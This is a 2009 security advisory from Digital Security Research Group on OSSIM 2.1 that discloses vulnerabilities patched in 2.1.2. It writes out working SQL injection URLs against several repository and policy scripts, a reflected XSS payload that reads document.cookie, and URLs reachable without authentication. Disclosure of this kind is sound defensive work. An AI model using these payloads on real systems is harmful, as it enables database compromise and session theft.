[DSECRG-09-055] OSSIM 2.1 - Multiple security vulnerabilities

2009-09-23T00:00:00
ID SECURITYVULNS:DOC:22499
Type securityvulns
Reporter Securityvulns
Modified 2009-09-23T00:00:00

Description

OSSIM - Open Source Security Information Management is vulnerable to multiple security vulnerabilities.

  1. SQL Injections
  2. Linked XSS
  3. Unauthorized access

Digital Security Research Group [DSecRG] Advisory #DSECRG-09-055

Application: OSSIM Versions Affected: 2.1 and may be 2.1.1 Vendor URL: http://ossim.net/ Bug: SQL Injection,XSS, Unauthorized access Exploits: YES Reported: 07.09.2009 Vendor response: 09.09.2009 Solution: YES (version 2.1.2) Date of Public Advisory:21.09.2009 Author: Sintsov Alexey of Digital Security Research Group [DSecRG]

Details


1.1 SQL injections in repository

Attacker need to be authorized in system for success.

Vulnerable script - repository_document.php Vulnerable parameter - id_document

Example


http://OSSIM-SERVER/ossim/repository/repository_document.php?id_document=-3 union select 1,2,user(),4,5,6--&maximized=1&search_bylink=&pag=1

1.2 SQL injections in repository

Attacker need to be authorized in system for success.

Vulnerable script - repository_links.php Vulnerable parameter - id_document

Example


http://OSSIM-SERVER/ossim/repository/repository_links.php?id_document=-3 union select 1,user(),3,4,5,6

1.3 SQL injections in repository

Attacker need to be authorized in system for success.

Vulnerable script - repository_editdocument.php Vulnerable parameter - id_document

Example


http://OSSIM-SERVER/ossim/repository/repository_editdocument.php?id_document=-3 union select 1,user(),3,4,5,6

1.4 SQL injection in policy scripts

Attacker need to be authorized in system for success.

Vulnerable script - getpolicy.php Vulnerable parameter - group

Example


http://OSSIM-SERVER/ossim/policy/getpolicy.php?group=0 and 1=1

1.5 SQL injection in policy scripts

Attacker need to be authorized in system for success.

Vulnerable script - newhostgroupform.php Vulnerable parameter - name

Example


http://OSSIM-SERVER/ossim/host/newhostgroupform.php?name=' union select user(),'b','c','d','f

1.6 SQL injection in policy scripts

Attacker need to be authorized in system for success.

Vulnerable script - modifynetform.php Vulnerable parameter - name

Example


http://OSSIM-SERVER/ossim/net/modifynetform.php?name=' union select user(),'b','c','d','e','f','g','h','a

And others scripts in policy menu.

  1. Linked XSS in main menu

Vulnerable script /ossim/ Vulnerable parameter - option

Example


http://OSSIM-SERVER/ossim/?option=0" onload=alert(document.cookie) a="

  1. Access to data without authentication.

Unauthorized user can see graphs and infrastructure

Example


Access to the graph: http://OSSIM-SERVER/ossim/graphs/alarms_events.php

Internal infrastructure view: http://OSSIM-SERVER/ossim/host/draw_tree.php

Fix Information


Upgrade to version 2.1.2

About


Digital Security is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsecrg [dot] com http://www.dsecrg.com